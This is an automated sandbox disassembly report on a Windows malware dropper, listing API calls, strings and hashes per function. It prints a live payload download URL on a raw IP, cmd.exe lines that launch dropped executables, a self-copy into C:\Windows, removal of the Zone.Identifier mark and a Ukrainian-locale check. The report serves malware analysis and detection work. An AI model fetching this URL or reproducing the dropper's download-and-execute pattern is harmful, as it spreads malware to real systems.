                                                                                                                                                                                              • Opcode Fuzzy Hash: 34e119f03330a37951e29d4ee19d5d58663b392051cfe4a9acefb3e3966ee614
                                                                                                                                                                                              • Instruction Fuzzy Hash: 07E0ED74D1020CFFDF00DF94C889BDEBBB8AB44315F1081A9E90567280D7B96A94CB95
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00406360: GetDriveTypeW.KERNEL32(?c@), ref: 0040636D
                                                                                                                                                                                              • lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00406353
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: DriveTypelstrcpy
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3664088370-0
                                                                                                                                                                                              • Opcode ID: 2d61ef023cbf4c1c2148b72ea45ffb06c686e76863e737ed56d1566052f9a4a4
                                                                                                                                                                                              • Instruction ID: 07938d44ddb1935cabae668892a579954ff71e0ca3886b5fa6316a5d3981c012
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2d61ef023cbf4c1c2148b72ea45ffb06c686e76863e737ed56d1566052f9a4a4
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9FF01D75900248FBDB04DFA4D4557DEB7B4EF44304F04C5A9E81AAB280E679AB58CB89
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$wsprintf$ExistsPath$AttributesDelete$CreateDirectory_chkstk
                                                                                                                                                                                              • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\rvlcfg.exe$%s\%s\rvldrv.exe$%s\*$C:\Windows\sysppvrdnvs.exe$shell32.dll$shell32.dll$shell32.dll$shell32.dll
                                                                                                                                                                                              • API String ID: 495142193-2225385857
                                                                                                                                                                                              • Opcode ID: bba10b6da6457b63d7fe7870a3bcf93d38d67b95bd357d565e7f9915594a4b88
                                                                                                                                                                                              • Instruction ID: 1e7642a3bb229a683b77cec8f60a4b6186945a0df842d4041ba496de3fd539ef
                                                                                                                                                                                              • Opcode Fuzzy Hash: bba10b6da6457b63d7fe7870a3bcf93d38d67b95bd357d565e7f9915594a4b88
                                                                                                                                                                                              • Instruction Fuzzy Hash: 500270B5900218EBDB20DB60DC44FEA7778BF44705F0485EAF50AA6190DBB89BD4CF69
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00406F1A,00000000), ref: 004067AF
                                                                                                                                                                                              • wsprintfW.USER32 ref: 004067C5
                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 004067DC
                                                                                                                                                                                              • lstrcmpW.KERNEL32(?,00411368), ref: 00406801
                                                                                                                                                                                              • lstrcmpW.KERNEL32(?,0041136C), ref: 00406817
                                                                                                                                                                                              • wsprintfW.USER32 ref: 0040683A
                                                                                                                                                                                              • wsprintfW.USER32 ref: 0040685A
                                                                                                                                                                                              • MoveFileExW.KERNEL32(?,?,00000009), ref: 00406896
                                                                                                                                                                                              • FindNextFileW.KERNEL32(000000FF,?), ref: 004068AA
                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 004068BF
                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 004068C9
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                                                                                                                                              • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                              • API String ID: 92872011-445461498
                                                                                                                                                                                              • Opcode ID: e29d1c6c13065a126f61562b4b6d2eaef25e121113ba2b4fb370d418db62171d
                                                                                                                                                                                              • Instruction ID: 96f5080d1998a7d60275ba97af61759e4b4e94f5b4bc08b7936e0b3de653678a
                                                                                                                                                                                              • Opcode Fuzzy Hash: e29d1c6c13065a126f61562b4b6d2eaef25e121113ba2b4fb370d418db62171d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 923145B5900218AFDB10DBA0DC88FDA7778BB48701F40C5E9F609A3195DA75EAD4CF98
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetLocaleInfoA.KERNEL32(00000400,00000007,?,0000000A,?,?,00407A28), ref: 0040F1C3
                                                                                                                                                                                              • strcmp.NTDLL ref: 0040F1D2
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: InfoLocalestrcmp
                                                                                                                                                                                              • String ID: UKR
                                                                                                                                                                                              • API String ID: 3191669094-64918367
                                                                                                                                                                                              • Opcode ID: 8e44c828f7342be6b1b961f5fa6f40dd4523076a999cbca5f949ecc83b5425ee
                                                                                                                                                                                              • Instruction ID: 1be06a77ef1098bc08a48f46d8927727b75ba0885e831d13d66ebc3380d14d50
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e44c828f7342be6b1b961f5fa6f40dd4523076a999cbca5f949ecc83b5425ee
                                                                                                                                                                                              • Instruction Fuzzy Hash: FDE01276E44308B6DA20A6A0AD02BE6776C6715705F0001B6BE08AA5C1E9B9961DC7EA
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 004064A9
                                                                                                                                                                                              • srand.MSVCRT ref: 004064B0
                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 004064D0
                                                                                                                                                                                              • rand.MSVCRT ref: 004064D6
                                                                                                                                                                                              • rand.MSVCRT ref: 004064EA
                                                                                                                                                                                              • wsprintfW.USER32 ref: 0040650F
                                                                                                                                                                                              • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00406525
                                                                                                                                                                                              • InternetOpenUrlW.WININET(00000000,http://185.215.113.66/tdrp.exe,00000000,00000000,00000000,00000000), ref: 00406552
                                                                                                                                                                                              • CreateFileW.KERNEL32(00415BA8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040657F
                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,00000103,?), ref: 004065B2
                                                                                                                                                                                              • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 004065E3
                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 004065F2
                                                                                                                                                                                              • wsprintfW.USER32 ref: 00406609
                                                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 00406619
                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 0040662D
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040663A
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00406647
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • %temp%, xrefs: 004064CB
                                                                                                                                                                                              • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 00406520
                                                                                                                                                                                              • %s\%d%d.exe, xrefs: 00406505
                                                                                                                                                                                              • %s:Zone.Identifier, xrefs: 004065FD
                                                                                                                                                                                              • http://185.215.113.66/tdrp.exe, xrefs: 00406546
                                                                                                                                                                                              • .#v, xrefs: 004065F2, 0040662D
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Internet$CloseFileHandle$Openrandwsprintf$CountCreateDeleteEnvironmentExpandReadStringsTickWritesrand
                                                                                                                                                                                              • String ID: %s:Zone.Identifier$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36$http://185.215.113.66/tdrp.exe$.#v
                                                                                                                                                                                              • API String ID: 2816847299-151917633
                                                                                                                                                                                              • Opcode ID: db0eaae3e853224ad670cce8e70ecd23fd08653b657d015a3b33c3440649b795
                                                                                                                                                                                              • Instruction ID: 1fb007f132407df9fd1c0735e7405706d6c761cf3eec079010f6fac199ffc060
                                                                                                                                                                                              • Opcode Fuzzy Hash: db0eaae3e853224ad670cce8e70ecd23fd08653b657d015a3b33c3440649b795
                                                                                                                                                                                              • Instruction Fuzzy Hash: 524194B4A41318BBD7209B60DC4DFDA7774AB48701F1085E5F60AB61D1DABD6AC0CF28
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040192C
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
                                                                                                                                                                                              • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
                                                                                                                                                                                              • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
                                                                                                                                                                                              • accept.WS2_32(?,?,?), ref: 004019A8
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 004019F6
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 00401A09
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00401A43
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 00401A52
                                                                                                                                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00401AAB
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                                                                                                                                              • String ID: PCOI$ilci
                                                                                                                                                                                              • API String ID: 3345448188-3762367603
                                                                                                                                                                                              • Opcode ID: 5def7e071e7da6894acac3e8c9e4b3eb82f64dc1225d37b855f6bd456c2498ea
                                                                                                                                                                                              • Instruction ID: 80b39a6ab1993389b90647d5cb6895440bceaa9a0d1ea8ab9cba8154187b69d5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5def7e071e7da6894acac3e8c9e4b3eb82f64dc1225d37b855f6bd456c2498ea
                                                                                                                                                                                              • Instruction Fuzzy Hash: A7411771601201ABCB20DF74DC8CB9B77A9AF44720F04863DF855A72E1DB78E985CB99
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • memset.NTDLL ref: 0040EF98
                                                                                                                                                                                              • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040EFE8
                                                                                                                                                                                              • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040EFFB
                                                                                                                                                                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040F034
                                                                                                                                                                                              • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040F06A
                                                                                                                                                                                              • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040F095
                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,004126B0,000000FF,00009E34), ref: 0040F0BF
                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040F0FE
                                                                                                                                                                                              • memcpy.NTDLL(00000000,?,00000000), ref: 0040F150
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040F181
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040F18E
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040F19B
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                                                                                                                                              • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                                                                                                                                              • API String ID: 2761394606-2217117414
                                                                                                                                                                                              • Opcode ID: 48caadfad9c7ab3af6f27c5da5da9c09f3769a6c19190aa75f6955b0391b6548
                                                                                                                                                                                              • Instruction ID: ef1808732392904e9289ee89b59ca4b2c464bfe5f798c53c6f33b23f739279b9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 48caadfad9c7ab3af6f27c5da5da9c09f3769a6c19190aa75f6955b0391b6548
                                                                                                                                                                                              • Instruction Fuzzy Hash: 40510AB5A01228ABDB36CF54DC54BDA73BCAB48705F1081E9B50DAA280D7B96FC4CF54
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                                                                                                                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(?), ref: 00401691
                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                                                                                                                                                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                                                                                                                                                                              • WSACloseEvent.WS2_32(?), ref: 00401715
                                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                                                                                                                                              • String ID: PCOI$ilci$.#v
                                                                                                                                                                                              • API String ID: 2403999931-387814812
                                                                                                                                                                                              • Opcode ID: efb049a2581240a5a3752b10eb22395ee38dfd009db395b337f3383873aa31ff
                                                                                                                                                                                              • Instruction ID: 00719830d96ac068de130eecfd85e1b44ef6fd60ec2c55820453df0d9b8f54e2
                                                                                                                                                                                              • Opcode Fuzzy Hash: efb049a2581240a5a3752b10eb22395ee38dfd009db395b337f3383873aa31ff
                                                                                                                                                                                              • Instruction Fuzzy Hash: B731A671900705ABC710AF70EC48B97B7B8BF09300F048A2AE569A7691D779F894CB98
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • memset.NTDLL ref: 0040E668
                                                                                                                                                                                              • InternetCrackUrlA.WININET(0040E119,00000000,10000000,0000003C), ref: 0040E6B8
                                                                                                                                                                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E6C8
                                                                                                                                                                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E701
                                                                                                                                                                                              • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E737
                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E75F
                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E7A8
                                                                                                                                                                                              • memcpy.NTDLL(00000000,?,00000000), ref: 0040E7FA
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040E837
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040E844
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040E851
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                                                                                                                                              • String ID: <$GET
                                                                                                                                                                                              • API String ID: 1205665004-427699995
                                                                                                                                                                                              • Opcode ID: 74e573df251a3fdd9775996cb884078f57aebd0a6693bdda84868dee8850155f
                                                                                                                                                                                              • Instruction ID: bd69c55cfb2b9f93b8bf7ceaaaaaf86fc3309545456039a657a23fe3286800e0
                                                                                                                                                                                              • Opcode Fuzzy Hash: 74e573df251a3fdd9775996cb884078f57aebd0a6693bdda84868dee8850155f
                                                                                                                                                                                              • Instruction Fuzzy Hash: F75109B1A41228ABDB36DB50CC55BE973BCAB44705F0484E9E60DAA2C0D7B96BC4CF54
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00415B88,00000000,0040C2A2,006A0266,?,0040C2BE,00000000,0040D66C,?), ref: 004060AF
                                                                                                                                                                                              • memcpy.NTDLL(?,00000000,00000100), ref: 00406141
                                                                                                                                                                                              • CreateFileW.KERNEL32(C:\Users\user\tbtcmds.dat,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00406265
                                                                                                                                                                                              • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 004062C7
                                                                                                                                                                                              • FlushFileBuffers.KERNEL32(000000FF), ref: 004062D3
                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 004062DD
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00415B88,?,?,?,?,?,?,0040C2BE,00000000,0040D66C,?), ref: 004062E8
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
                                                                                                                                                                                              • String ID: C:\Users\user\tbtcmds.dat$.#v
                                                                                                                                                                                              • API String ID: 1457358591-1503835424
                                                                                                                                                                                              • Opcode ID: acef95171fe914400af161e3ad861a3f1311d831e466546ea9f77ab4e276f608
                                                                                                                                                                                              • Instruction ID: a605c5c2860c2acc1241a09a2373603bf375adc509756cd8cb030c585388e075
                                                                                                                                                                                              • Opcode Fuzzy Hash: acef95171fe914400af161e3ad861a3f1311d831e466546ea9f77ab4e276f608
                                                                                                                                                                                              • Instruction Fuzzy Hash: D171BCB4E042099FCB04DF94D981FEFB7B1AF88304F14816DE506AB381D779A951CBA9
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 0040666B
                                                                                                                                                                                              • CoCreateInstance.OLE32(00413030,00000000,00000001,00413010,00000008), ref: 00406683
                                                                                                                                                                                              • wsprintfW.USER32 ref: 004066C4
                                                                                                                                                                                              • wsprintfW.USER32 ref: 004066E5
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • /c start %s & start %s\rvlcfg.exe, xrefs: 004066D9
                                                                                                                                                                                              • %comspec%, xrefs: 004066EE
                                                                                                                                                                                              • cl@, xrefs: 004066A0
                                                                                                                                                                                              • /c start %s & start %s\rvldrv.exe & start %s\rvlcfg.exe, xrefs: 004066B8
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: wsprintf$CreateInitializeInstance
                                                                                                                                                                                              • String ID: %comspec%$/c start %s & start %s\rvlcfg.exe$/c start %s & start %s\rvldrv.exe & start %s\rvlcfg.exe$cl@
                                                                                                                                                                                              • API String ID: 1147330536-497122036
                                                                                                                                                                                              • Opcode ID: eee1a2fc8572b98f6c40a5fc3c9db374d26e8a3e47ee9b9990b59bb952fb1ff2
                                                                                                                                                                                              • Instruction ID: e126a915917d584c7bd6e3cca15df18ca7e9be12ab45cc4692bb8e15b90f0fb7
                                                                                                                                                                                              • Opcode Fuzzy Hash: eee1a2fc8572b98f6c40a5fc3c9db374d26e8a3e47ee9b9990b59bb952fb1ff2
                                                                                                                                                                                              • Instruction Fuzzy Hash: 67411D75A40208AFC704DF98C885FDEB7B5AF88704F208199F515A72A5C675AE81CB54
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00401DB0
                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00401DC3
                                                                                                                                                                                              • InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00401E5B
                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00401EF6
                                                                                                                                                                                              • setsockopt.WS2_32 ref: 00401F2C
                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 00401F39
                                                                                                                                                                                                • Part of subcall function 0040DF20: NtQuerySystemTime.NTDLL(0040BD65), ref: 0040DF2A
                                                                                                                                                                                                • Part of subcall function 0040DF20: RtlTimeToSecondsSince1980.NTDLL(0040BD65,?), ref: 0040DF38
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
